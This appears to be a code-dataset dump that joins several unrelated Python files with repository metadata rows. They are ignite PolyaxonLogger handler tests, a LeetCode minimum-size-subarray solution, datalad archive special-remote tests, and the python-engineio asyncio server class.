    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State(metrics={"a": 12.23, "b": 23.45, "c": torch.tensor(10.0)})
    mock_engine.state.iteration = 5
    wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/c": 10.0})
    # 1-D tensor metric: each element is logged as '<tag>/<name>/<index>'.
    wrapper = OutputHandler("tag", metric_names=["a",])
    mock_engine = MagicMock()
    mock_engine.state = State(metrics={"a": torch.Tensor([0.0, 1.0, 2.0, 3.0])})
    mock_engine.state.iteration = 5
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_has_calls(
        [call(step=5, **{"tag/a/0": 0.0, "tag/a/1": 1.0, "tag/a/2": 2.0, "tag/a/3": 3.0}),], any_order=True
    )
    # Non-numeric metric ('c') is dropped and triggers a UserWarning.
    wrapper = OutputHandler("tag", metric_names=["a", "c"])
    mock_engine = MagicMock()
    mock_engine.state = State(metrics={"a": 55.56, "c": "Some text"})
    mock_engine.state.iteration = 7
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    with pytest.warns(UserWarning):
        wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_has_calls([call(step=7, **{"tag/a": 55.56})], any_order=True)
    # all metrics
    wrapper = OutputHandler("tag", metric_names="all")
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State(metrics={"a": 12.23, "b": 23.45, "c": torch.tensor(10.0)})
    mock_engine.state.iteration = 5
    wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/c": 10.0})
def test_output_handler_both():
    """metric_names and output_transform can be combined in one call."""
    wrapper = OutputHandler("tag", metric_names=["a", "b"], output_transform=lambda x: {"loss": x})
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State(metrics={"a": 12.23, "b": 23.45})
    mock_engine.state.epoch = 5
    mock_engine.state.output = 12345
    wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_called_once_with(step=5, **{"tag/a": 12.23, "tag/b": 23.45, "tag/loss": 12345})
def test_output_handler_with_wrong_global_step_transform_output():
    """A global_step_transform returning a non-int must raise TypeError."""
    def global_step_transform(*args, **kwargs):
        return "a"  # invalid: global step must be an int

    wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State()
    mock_engine.state.epoch = 5
    mock_engine.state.output = 12345
    with pytest.raises(TypeError, match="global_step must be int"):
        wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
def test_output_handler_with_global_step_transform():
    """The step passed to log_metrics comes from global_step_transform."""
    def global_step_transform(*args, **kwargs):
        return 10

    wrapper = OutputHandler("tag", output_transform=lambda x: {"loss": x}, global_step_transform=global_step_transform)
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    mock_engine = MagicMock()
    mock_engine.state = State()
    mock_engine.state.epoch = 5  # ignored: transform supplies the step
    mock_engine.state.output = 12345
    wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
    mock_logger.log_metrics.assert_called_once_with(step=10, **{"tag/loss": 12345})
def test_output_handler_with_global_step_from_engine():
    """The step must track the *other* engine's epoch when
    ``global_step_from_engine`` is used, even as both engines advance."""
    # Engine that provides the global step (epoch 10, later 11).
    mock_another_engine = MagicMock()
    mock_another_engine.state = State()
    mock_another_engine.state.epoch = 10
    mock_another_engine.state.output = 12.345
    wrapper = OutputHandler(
        "tag",
        output_transform=lambda x: {"loss": x},
        global_step_transform=global_step_from_engine(mock_another_engine),
    )
    mock_logger = MagicMock(spec=PolyaxonLogger)
    mock_logger.log_metrics = MagicMock()
    # Engine being logged; its own epoch (1) must NOT be used as the step.
    mock_engine = MagicMock()
    mock_engine.state = State()
    mock_engine.state.epoch = 1
    mock_engine.state.output = 0.123
    # First call: step comes from mock_another_engine (10), value from mock_engine.
    wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
    assert mock_logger.log_metrics.call_count == 1
    mock_logger.log_metrics.assert_has_calls(
        [call(step=mock_another_engine.state.epoch, **{"tag/loss": mock_engine.state.output})]
    )
    # Advance both engines and verify the second call reflects the new values.
    mock_another_engine.state.epoch = 11
    mock_engine.state.output = 1.123
    wrapper(mock_engine, mock_logger, Events.EPOCH_STARTED)
    assert mock_logger.log_metrics.call_count == 2
    mock_logger.log_metrics.assert_has_calls(
        [call(step=mock_another_engine.state.epoch, **{"tag/loss": mock_engine.state.output})]
    )
def test_optimizer_params_handler_wrong_setup():
    # The constructor must reject anything that is not an Optimizer.
    with pytest.raises(TypeError):
        OptimizerParamsHandler(optimizer=None)
    # Even with a valid optimizer, invoking the handler with a logger that
    # is not a PolyaxonLogger must fail loudly.
    optimizer = MagicMock(spec=torch.optim.Optimizer)
    handler = OptimizerParamsHandler(optimizer=optimizer)
    with pytest.raises(RuntimeError, match="Handler 'OptimizerParamsHandler' works only with PolyaxonLogger"):
        handler(MagicMock(), MagicMock(), Events.ITERATION_STARTED)
def test_optimizer_params():
    optimizer = torch.optim.SGD([torch.Tensor(0)], lr=0.01)
    engine = MagicMock()
    engine.state = State()
    engine.state.iteration = 123
    # Without a tag the parameter is logged as "<param_name>/group_<idx>".
    handler = OptimizerParamsHandler(optimizer=optimizer, param_name="lr")
    logger = MagicMock(spec=PolyaxonLogger)
    logger.log_metrics = MagicMock()
    handler(engine, logger, Events.ITERATION_STARTED)
    logger.log_metrics.assert_called_once_with(**{"lr/group_0": 0.01, "step": 123})
    # With a tag the key gains a "<tag>/" prefix.
    handler = OptimizerParamsHandler(optimizer, param_name="lr", tag="generator")
    logger = MagicMock(spec=PolyaxonLogger)
    logger.log_metrics = MagicMock()
    handler(engine, logger, Events.ITERATION_STARTED)
    logger.log_metrics.assert_called_once_with(**{"generator/lr/group_0": 0.01, "step": 123})
def test_integration():
    # Smoke test: a real Engine run with a PolyaxonLogger handler attached
    # at EPOCH_COMPLETED must complete without errors.
    n_epochs = 5
    data = list(range(50))
    loss_stream = iter(torch.rand(n_epochs * len(data)))
    def update_fn(engine, batch):
        return next(loss_stream)
    trainer = Engine(update_fn)
    plx_logger = PolyaxonLogger()
    def dummy_handler(engine, logger, event_name):
        step = engine.state.get_event_attrib_value(event_name)
        logger.log_metrics(step=step, **{"test_value": step})
    plx_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
    trainer.run(data, max_epochs=n_epochs)
def test_integration_as_context_manager():
    # Same smoke test as test_integration, but the logger is used as an
    # async-friendly context manager so it is closed on exit.
    n_epochs = 5
    data = list(range(50))
    loss_stream = iter(torch.rand(n_epochs * len(data)))
    def update_fn(engine, batch):
        return next(loss_stream)
    with PolyaxonLogger() as plx_logger:
        trainer = Engine(update_fn)
        def dummy_handler(engine, logger, event_name):
            step = engine.state.get_event_attrib_value(event_name)
            logger.log_metrics(step=step, **{"test_value": step})
        plx_logger.attach(trainer, log_handler=dummy_handler, event_name=Events.EPOCH_COMPLETED)
        trainer.run(data, max_epochs=n_epochs)
@pytest.fixture
def no_site_packages():
    """Temporarily hide installed polyaxon modules and site-packages.

    Removes every already-imported ``polyaxon*`` module from
    ``sys.modules`` and strips ``site-packages`` entries from ``sys.path``
    so the code under test behaves as if polyaxon-client were not
    installed.  Everything is restored on teardown.
    """
    import sys
    # Snapshot the module table first: iterating sys.modules directly can
    # raise "RuntimeError: dictionary changed size during iteration" if an
    # import happens while we scan (e.g. a lazily-imported module).
    polyaxon_client_modules = {
        k: v for k, v in list(sys.modules.items()) if "polyaxon" in k
    }
    for k in polyaxon_client_modules:
        del sys.modules[k]
    prev_path = list(sys.path)
    sys.path = [p for p in sys.path if "site-packages" not in p]
    yield "no_site_packages"
    # Teardown: restore the search path and the cached modules.
    sys.path = prev_path
    sys.modules.update(polyaxon_client_modules)
def test_no_polyaxon_client(no_site_packages):
    # With polyaxon-client hidden (no_site_packages fixture), constructing
    # the logger must raise an informative RuntimeError.
    with pytest.raises(RuntimeError, match=r"This contrib module requires polyaxon-client to be installed"):
        PolyaxonLogger()
| 33.291391 | 119 | 0.718321 |
c65a684360c87ee16131bcefe6b6f9474ef1d602 | 472 | py | Python | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | null | null | null | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | null | null | null | two_pointer/209_minimum_size_subarray_sum.py | shawlu95/Algorithm-Toolbox | b6c7b2228d8e70e0842e0bad607533a2c8322cf0 | [
"MIT"
] | 2 | 2020-02-07T20:49:02.000Z | 2020-02-11T06:01:55.000Z | class Solution(object):
def minSubArrayLen(self, s, nums):
"""
:type s: int
:type nums: List[int]
:rtype: int
"""
ans = float('inf')
cum = 0
i = 0
for j in range(len(nums)):
cum += nums[j]
while cum >= s:
ans = min(ans, j - i + 1)
cum -= nums[i]
i += 1
if ans == float('inf'):
return 0
return ans | 24.842105 | 41 | 0.379237 |
edb83aa98de4caded566f15d77faa2a4a6212da0 | 10,667 | py | Python | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | datalad/customremotes/tests/test_archives.py | jelmer/datalad | fedc04867d87e0191bd500991d0df97e97113457 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Tests for customremotes archives providing dl+archive URLs handling"""
from datalad.tests.utils import known_failure_v6
from datalad.tests.utils import known_failure_direct_mode
from ..archives import ArchiveAnnexCustomRemote
from ..base import AnnexExchangeProtocol
from ...support.annexrepo import AnnexRepo
from ...consts import ARCHIVES_SPECIAL_REMOTE
from ...tests.utils import *
from ...cmd import Runner, GitRunner
from ...utils import _path_
from . import _get_custom_runner
# both files will have the same content
# fn_inarchive_obscure = 'test.dat'
# fn_extracted_obscure = 'test2.dat'
fn_inarchive_obscure = get_most_obscure_supported_name()
fn_archive_obscure = fn_inarchive_obscure.replace('a', 'b') + '.tar.gz'
fn_extracted_obscure = fn_inarchive_obscure.replace('a', 'z')
#import line_profiler
#prof = line_profiler.LineProfiler()
# TODO: with_tree ATM for archives creates this nested top directory
# matching archive name, so it will be a/d/test.dat ... we don't want that probably
@with_direct
@with_tree(
    tree=(('a.tar.gz', {'d': {fn_inarchive_obscure: '123'}}),
          ('simple.txt', '123'),
          (fn_archive_obscure, (('d', ((fn_inarchive_obscure, '123'),)),)),
          (fn_extracted_obscure, '123')))
@with_tempfile()
def test_basic_scenario(direct, d, d2):
    """End-to-end check of the dl+archive special remote.

    Registers the archives special remote in a fresh annex, attaches a
    dl+archive URL to a file, and verifies drop/get round-trips both in the
    original repository and in a clone (which must fetch the tarball to
    extract the file).
    """
    fn_archive, fn_extracted = fn_archive_obscure, fn_extracted_obscure
    annex = AnnexRepo(d, runner=_get_custom_runner(d), direct=direct)
    annex.init_remote(
        ARCHIVES_SPECIAL_REMOTE,
        ['encryption=none', 'type=external', 'externaltype=%s' % ARCHIVES_SPECIAL_REMOTE,
         'autoenable=true'
         ])
    assert annex.is_special_annex_remote(ARCHIVES_SPECIAL_REMOTE)
    # We want two maximally obscure names, which are also different
    assert(fn_extracted != fn_inarchive_obscure)
    annex.add(fn_archive)
    annex.commit(msg="Added tarball")
    annex.add(fn_extracted)
    annex.commit(msg="Added the load file")
    # Operations with archive remote URL
    annexcr = ArchiveAnnexCustomRemote(path=d)
    # few quick tests for get_file_url
    eq_(annexcr.get_file_url(archive_key="xyz", file="a.dat"), "dl+archive:xyz#path=a.dat")
    eq_(annexcr.get_file_url(archive_key="xyz", file="a.dat", size=999), "dl+archive:xyz#path=a.dat&size=999")
    # see https://github.com/datalad/datalad/issues/441#issuecomment-223376906
    # old style
    eq_(annexcr._parse_url("dl+archive:xyz/a.dat#size=999"), ("xyz", "a.dat", {'size': 999}))
    eq_(annexcr._parse_url("dl+archive:xyz/a.dat"), ("xyz", "a.dat", {})) # old format without size
    # new style
    eq_(annexcr._parse_url("dl+archive:xyz#path=a.dat&size=999"), ("xyz", "a.dat", {'size': 999}))
    eq_(annexcr._parse_url("dl+archive:xyz#path=a.dat"), ("xyz", "a.dat", {})) # old format without size
    file_url = annexcr.get_file_url(
        archive_file=fn_archive,
        file=fn_archive.replace('.tar.gz', '') + '/d/'+fn_inarchive_obscure)
    annex.add_url_to_file(fn_extracted, file_url, ['--relaxed'])
    annex.drop(fn_extracted)
    # The archives special remote must be listed as a location for the file.
    list_of_remotes = annex.whereis(fn_extracted, output='descriptions')
    in_('[%s]' % ARCHIVES_SPECIAL_REMOTE, list_of_remotes)
    assert_false(annex.file_has_content(fn_extracted))
    annex.get(fn_extracted)
    assert_true(annex.file_has_content(fn_extracted))
    # Without the URL the only remaining copy is local, so drop must fail.
    annex.rm_url(fn_extracted, file_url)
    assert_false(annex.drop(fn_extracted)['success'])
    annex.add_url_to_file(fn_extracted, file_url)
    annex.drop(fn_extracted)
    annex.get(fn_extracted)
    annex.drop(fn_extracted) # so we don't get from this one next
    # Let's create a clone and verify chain of getting file through the tarball
    cloned_annex = AnnexRepo.clone(d, d2,
                                   runner=_get_custom_runner(d2),
                                   direct=direct)
    # we still need to enable manually atm that special remote for archives
    # cloned_annex.enable_remote('annexed-archives')
    assert_false(cloned_annex.file_has_content(fn_archive))
    assert_false(cloned_annex.file_has_content(fn_extracted))
    cloned_annex.get(fn_extracted)
    assert_true(cloned_annex.file_has_content(fn_extracted))
    # as a result it would also fetch tarball
    assert_true(cloned_annex.file_has_content(fn_archive))
    # Check if protocol was collected
    if os.environ.get('DATALAD_TESTS_PROTOCOLREMOTE'):
        assert_is_instance(annex.cmd_call_wrapper.protocol, AnnexExchangeProtocol)
        protocol_file = _path_(annex.path,
                               '.git/bin/git-annex-remote-datalad-archive')
        ok_file_has_content(protocol_file, "VERSION 1", re_=True, match=False)
        ok_file_has_content(protocol_file, "GETAVAILABILITY", re_=True, match=False)
        ok_file_has_content(protocol_file, "#!/bin/bash", re_=True, match=False)
    else:
        assert_false(isinstance(annex.cmd_call_wrapper.protocol, AnnexExchangeProtocol))
    # verify that we can drop if original archive gets dropped but available online:
    # -- done as part of the test_add_archive_content.py
    # verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! ;)
@with_tree(
    tree={'a.tar.gz': {'d': {fn_inarchive_obscure: '123'}}}
)
@known_failure_direct_mode #FIXME
def test_annex_get_from_subdir(topdir):
    """git-annex drop/get must work from inside the extracted subdirectory."""
    from datalad.api import add_archive_content
    annex = AnnexRepo(topdir, init=True)
    annex.add('a.tar.gz')
    annex.commit()
    # Extract the tarball content into the annex (tarball itself removed).
    add_archive_content('a.tar.gz', annex=annex, delete=True)
    fpath = opj(topdir, 'a', 'd', fn_inarchive_obscure)
    # Run plain git-annex commands from within the subdirectory.
    with chpwd(opj(topdir, 'a', 'd')):
        runner = Runner()
        runner(['git', 'annex', 'drop', '--', fn_inarchive_obscure]) # run git annex drop
        assert_false(annex.file_has_content(fpath)) # and verify if file deleted from directory
        runner(['git', 'annex', 'get', '--', fn_inarchive_obscure]) # run git annex get
        assert_true(annex.file_has_content(fpath)) # and verify if file got into directory
def test_get_git_environ_adjusted():
    """GIT_DIR/GIT_WORK_TREE are absolutized; other variables pass through."""
    runner = GitRunner()
    env_in = {"GIT_DIR": "../../.git", "GIT_WORK_TREE": "../../", "TEST_VAR": "Exists"}
    adjusted = runner.get_git_environ_adjusted(env_in)
    # Relative git paths must come back as absolute paths.
    for var in ("GIT_DIR", "GIT_WORK_TREE"):
        assert_equal(adjusted[var], abspath(env_in[var]))
    # Unrelated variables are returned unaltered.
    assert_equal(adjusted["TEST_VAR"], env_in["TEST_VAR"])
    # Without an explicit environment, the process environment is used.
    sys_env = runner.get_git_environ_adjusted()
    assert_equal(sys_env["PWD"], os.environ.get("PWD"))
def test_no_rdflib_loaded():
    # Importing the archives custom remote must not pull in rdflib, since
    # that adds a ~300ms startup delay with no immediate use.  A subprocess
    # prints whichever rdflib modules end up loaded; there must be none.
    from ...cmd import Runner
    probe = 'import datalad.customremotes.archives, sys; print([k for k in sys.modules if k.startswith("rdflib")])'
    with swallow_outputs() as cmo:
        Runner().run([sys.executable, '-c', probe],
                     log_stdout=False, log_stderr=False)
        assert_not_in("rdflib", cmo.out)
        assert_not_in("rdflib", cmo.err)
from .test_base import BASE_INTERACTION_SCENARIOS, check_interaction_scenario
@with_tree(tree={'archive.tar.gz': {'f1.txt': 'content'}})
def test_interactions(tdir):
    """Replay scripted annex<->remote protocol exchanges and verify replies.

    Each scenario is a list of (message-from-annex, expected-reply) pairs;
    a ``None`` reply means no response is expected for that message.
    """
    # Just a placeholder since constructor expects a repo
    repo = AnnexRepo(tdir, create=True, init=True)
    repo.add('archive.tar.gz')
    repo.commit('added')
    for scenario in BASE_INTERACTION_SCENARIOS + [
        [
            ('GETCOST', 'COST %d' % ArchiveAnnexCustomRemote.COST),
        ],
        [
            # by default we do not require any fancy init
            # no urls supported by default
            ('CLAIMURL http://example.com', 'CLAIMURL-FAILURE'),
            # we know that is just a single option, url, is expected so full
            # one would be passed
            ('CLAIMURL http://example.com roguearg', 'CLAIMURL-FAILURE'),
        ],
        # basic interaction failing to fetch content from archive
        [
            ('TRANSFER RETRIEVE somekey somefile', 'GETURLS somekey dl+archive:'),
            ('VALUE dl+archive://somekey2#path', None),
            ('VALUE dl+archive://somekey3#path', None),
            ('VALUE',
             re.compile(
                 'TRANSFER-FAILURE RETRIEVE somekey Failed to fetch any '
                 'archive containing somekey. Tried: \[\]')
             )
        ],
        # # incorrect response received from annex -- something isn't right but ... later
        # [
        #     ('TRANSFER RETRIEVE somekey somefile', 'GETURLS somekey dl+archive:'),
        #     # We reply with UNSUPPORTED-REQUEST in these cases
        #     ('GETCOST', 'UNSUPPORTED-REQUEST'),
        # ],
    ]:
        check_interaction_scenario(ArchiveAnnexCustomRemote, tdir, scenario)
from datalad.tests.utils import serve_path_via_http
@with_tree(tree=
    {'1.tar.gz':
         {
             'bu.dat': '52055957098986598349795121365535'*10000,
             'bu3.dat': '8236397048205454767887168342849275422'*10000
         },
     '2.tar.gz':
         {
             'bu2.dat': '17470674346319559612580175475351973007892815102'*10000
         },
    }
)
@serve_path_via_http()
@with_tempfile
def check_observe_tqdm(topdir, topurl, outdir):
    # just a helper to enable/use when want quickly to get some
    # repository with archives and observe tqdm
    # NOTE: not a real test (name starts with "check_", so nose/pytest skip
    # it); it ends in an infinite loop on purpose so the repository can be
    # inspected interactively while progress bars are shown.
    from datalad.api import create, download_url, add_archive_content
    ds = create(outdir)
    for f in '1.tar.gz', '2.tar.gz':
        with chpwd(outdir):
            ds.repo.add_url_to_file(f, topurl + f)
            ds.add(f)
            add_archive_content(f, delete=True, drop_after=True)
    files = glob.glob(opj(outdir, '*'))
    ds.drop(files)  # will not drop tarballs
    ds.repo.drop([], options=['--all', '--fast'])
    ds.get(files)
    ds.repo.drop([], options=['--all', '--fast'])
    # now loop so we could play with it outside
    print(outdir)
    # import pdb; pdb.set_trace()
    while True:
        sleep(0.1)
| 41.996063 | 147 | 0.665979 |
d090539806149ed4a36670c4b5e0771912fb9384 | 19,303 | py | Python | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | engineio/asyncio_server.py | StoneMoe/python-engineio | 43f8fb5cd3fefe96768f8a8d91006787fa9c1c19 | [
"MIT"
] | null | null | null | import asyncio
import six
from six.moves import urllib
from . import exceptions
from . import packet
from . import server
from . import asyncio_socket
class AsyncServer(server.Server):
    """An Engine.IO server for asyncio.
    This class implements a fully compliant Engine.IO web server with support
    for websocket and long-polling transports, compatible with the asyncio
    framework on Python 3.5 or newer.
    :param async_mode: The asynchronous model to use. See the Deployment
                       section in the documentation for a description of the
                       available options. Valid async modes are "aiohttp",
                       "sanic", "tornado" and "asgi". If this argument is not
                       given, an async mode is chosen based on the installed
                       packages.
    :param ping_timeout: The time in seconds that the client waits for the
                         server to respond before disconnecting.
    :param ping_interval: The interval in seconds at which the client pings
                          the server.
    :param max_http_buffer_size: The maximum size of a message when using the
                                 polling transport.
    :param allow_upgrades: Whether to allow transport upgrades or not.
    :param http_compression: Whether to compress packages when using the
                             polling transport.
    :param compression_threshold: Only compress messages when their byte size
                                  is greater than this value.
    :param cookie: Name of the HTTP cookie that contains the client session
                   id. If set to ``None``, a cookie is not sent to the client.
    :param cors_allowed_origins: List of origins that are allowed to connect
                                 to this server. All origins are allowed by
                                 default.
    :param cors_credentials: Whether credentials (cookies, authentication) are
                             allowed in requests to this server.
    :param logger: To enable logging set to ``True`` or pass a logger object to
                   use. To disable logging set to ``False``.
    :param json: An alternative json module to use for encoding and decoding
                 packets. Custom json modules must have ``dumps`` and ``loads``
                 functions that are compatible with the standard library
                 versions.
    :param async_handlers: If set to ``True``, run message event handlers in
                           non-blocking threads. To run handlers synchronously,
                           set to ``False``. The default is ``True``.
    :param kwargs: Reserved for future extensions, any additional parameters
                   given as keyword arguments will be silently ignored.
    """
    def is_asyncio_based(self):
        # Tells the base class that coroutine handlers are expected.
        return True
    def async_modes(self):
        # Async frameworks supported by this asyncio implementation.
        return ['aiohttp', 'sanic', 'tornado', 'asgi']
    def attach(self, app, engineio_path='engine.io'):
        """Attach the Engine.IO server to an application."""
        engineio_path = engineio_path.strip('/')
        self._async['create_route'](app, self, '/{}/'.format(engineio_path))
    async def send(self, sid, data, binary=None):
        """Send a message to a client.
        :param sid: The session id of the recipient client.
        :param data: The data to send to the client. Data can be of type
                     ``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
                     or ``dict``, the data will be serialized as JSON.
        :param binary: ``True`` to send packet as binary, ``False`` to send
                       as text. If not given, unicode (Python 2) and str
                       (Python 3) are sent as text, and str (Python 2) and
                       bytes (Python 3) are sent as binary.
        Note: this method is a coroutine.
        """
        try:
            socket = self._get_socket(sid)
        except KeyError:
            # the socket is not available
            self.logger.warning('Cannot send to sid %s', sid)
            return
        await socket.send(packet.Packet(packet.MESSAGE, data=data,
                                        binary=binary))
    async def get_session(self, sid):
        """Return the user session for a client.
        :param sid: The session id of the client.
        The return value is a dictionary. Modifications made to this
        dictionary are not guaranteed to be preserved. If you want to modify
        the user session, use the ``session`` context manager instead.
        """
        socket = self._get_socket(sid)
        return socket.session
    async def save_session(self, sid, session):
        """Store the user session for a client.
        :param sid: The session id of the client.
        :param session: The session dictionary.
        """
        socket = self._get_socket(sid)
        socket.session = session
    def session(self, sid):
        """Return the user session for a client with context manager syntax.
        :param sid: The session id of the client.
        This is a context manager that returns the user session dictionary for
        the client. Any changes that are made to this dictionary inside the
        context manager block are saved back to the session. Example usage::
            @eio.on('connect')
            def on_connect(sid, environ):
                username = authenticate_user(environ)
                if not username:
                    return False
                with eio.session(sid) as session:
                    session['username'] = username
            @eio.on('message')
            def on_message(sid, msg):
                async with eio.session(sid) as session:
                    print('received message from ', session['username'])
        """
        # The inner class captures ``sid`` from the enclosing call via
        # closure (note __aenter__/__aexit__ use the closed-over ``sid``,
        # not ``self.sid``); behavior is the same since both hold the value.
        class _session_context_manager(object):
            def __init__(self, server, sid):
                self.server = server
                self.sid = sid
                self.session = None
            async def __aenter__(self):
                self.session = await self.server.get_session(sid)
                return self.session
            async def __aexit__(self, *args):
                await self.server.save_session(sid, self.session)
        return _session_context_manager(self, sid)
    async def disconnect(self, sid=None):
        """Disconnect a client.
        :param sid: The session id of the client to close. If this parameter
                    is not given, then all clients are closed.
        Note: this method is a coroutine.
        """
        if sid is not None:
            try:
                socket = self._get_socket(sid)
            except KeyError: # pragma: no cover
                # the socket was already closed or gone
                pass
            else:
                await socket.close()
                del self.sockets[sid]
        else:
            # NOTE(review): asyncio.wait() raises ValueError when given an
            # empty collection — presumably callers never invoke this with
            # zero connected clients; confirm before relying on it.
            await asyncio.wait([client.close()
                                for client in six.itervalues(self.sockets)])
            self.sockets = {}
    async def handle_request(self, *args, **kwargs):
        """Handle an HTTP request from the client.
        This is the entry point of the Engine.IO application. This function
        returns the HTTP response to deliver to the client.
        Note: this method is a coroutine.
        """
        # Normalize the framework-specific request into a WSGI-like environ.
        translate_request = self._async['translate_request']
        if asyncio.iscoroutinefunction(translate_request):
            environ = await translate_request(*args, **kwargs)
        else:
            environ = translate_request(*args, **kwargs)
        method = environ['REQUEST_METHOD']
        query = urllib.parse.parse_qs(environ.get('QUERY_STRING', ''))
        sid = query['sid'][0] if 'sid' in query else None
        # b64=1/true: client wants base64-encoded binary payloads;
        # j=<int>: client requests a JSONP (script tag) response.
        b64 = False
        jsonp = False
        jsonp_index = None
        if 'b64' in query:
            if query['b64'][0] == "1" or query['b64'][0].lower() == "true":
                b64 = True
        if 'j' in query:
            jsonp = True
            try:
                jsonp_index = int(query['j'][0])
            except (ValueError, KeyError, IndexError):
                # Invalid JSONP index number
                pass
        if method == 'GET':
            if sid is None:
                # No session id: this is a new connection request.
                transport = query.get('transport', ['polling'])[0]
                if transport != 'polling' and transport != 'websocket':
                    self.logger.warning('Invalid transport %s', transport)
                    r = self._bad_request()
                elif jsonp is True and jsonp_index is None:
                    self.logger.warning('Invalid JSONP index number')
                    r = self._bad_request()
                else:
                    r = await self._handle_connect(environ, transport,
                                                   b64, jsonp_index)
            else:
                # Existing session: a long-polling read (or ws upgrade).
                if sid not in self.sockets:
                    self.logger.warning('Invalid session %s', sid)
                    r = self._bad_request()
                elif jsonp is True and jsonp_index is None:
                    self.logger.warning('Invalid JSONP index number')
                    r = self._bad_request()
                else:
                    socket = self._get_socket(sid)
                    try:
                        packets = await socket.handle_get_request(environ)
                        if isinstance(packets, list):
                            r = self._ok(packets, b64=b64, jsonp_index=jsonp_index)
                        else:
                            r = packets
                    except exceptions.EngineIOError:
                        if sid in self.sockets: # pragma: no cover
                            await self.disconnect(sid)
                        r = self._bad_request()
                    if sid in self.sockets and self.sockets[sid].closed:
                        del self.sockets[sid]
        elif method == 'POST':
            # POST carries client-to-server packets over long-polling.
            if sid is None or sid not in self.sockets:
                self.logger.warning('Invalid session %s', sid)
                r = self._bad_request()
            elif jsonp is True and jsonp_index is None:
                self.logger.warning('Invalid JSONP index number')
                r = self._bad_request()
            else:
                socket = self._get_socket(sid)
                try:
                    await socket.handle_post_request(environ)
                    r = self._ok(jsonp_index=jsonp_index)
                except exceptions.EngineIOError:
                    if sid in self.sockets: # pragma: no cover
                        await self.disconnect(sid)
                    r = self._bad_request()
                except: # pragma: no cover
                    # for any other unexpected errors, we log the error
                    # and keep going
                    self.logger.exception('post request handler error')
                    r = self._ok(jsonp_index=jsonp_index)
        elif method == 'OPTIONS':
            r = self._ok()
        else:
            self.logger.warning('Method %s not supported', method)
            r = self._method_not_found()
        if not isinstance(r, dict):
            return r if r is not None else []
        # Optionally compress the payload when the client accepts it.
        if self.http_compression and \
                len(r['response']) >= self.compression_threshold:
            encodings = [e.split(';')[0].strip() for e in
                         environ.get('HTTP_ACCEPT_ENCODING', '').split(',')]
            for encoding in encodings:
                if encoding in self.compression_methods:
                    r['response'] = \
                        getattr(self, '_' + encoding)(r['response'])
                    r['headers'] += [('Content-Encoding', encoding)]
                    break
        cors_headers = self._cors_headers(environ)
        # Convert the internal response dict into a framework response.
        make_response = self._async['make_response']
        if asyncio.iscoroutinefunction(make_response):
            response = await make_response(r['status'],
                                           r['headers'] + cors_headers,
                                           r['response'], environ)
        else:
            response = make_response(r['status'], r['headers'] + cors_headers,
                                     r['response'], environ)
        return response
    def start_background_task(self, target, *args, **kwargs):
        """Start a background task using the appropriate async model.
        This is a utility function that applications can use to start a
        background task using the method that is compatible with the
        selected async mode.
        :param target: the target function to execute.
        :param args: arguments to pass to the function.
        :param kwargs: keyword arguments to pass to the function.
        The return value is a ``asyncio.Task`` object.
        """
        return asyncio.ensure_future(target(*args, **kwargs))
    async def sleep(self, seconds=0):
        """Sleep for the requested amount of time using the appropriate async
        model.
        This is a utility function that applications can use to put a task to
        sleep without having to worry about using the correct call for the
        selected async mode.
        Note: this method is a coroutine.
        """
        return await asyncio.sleep(seconds)
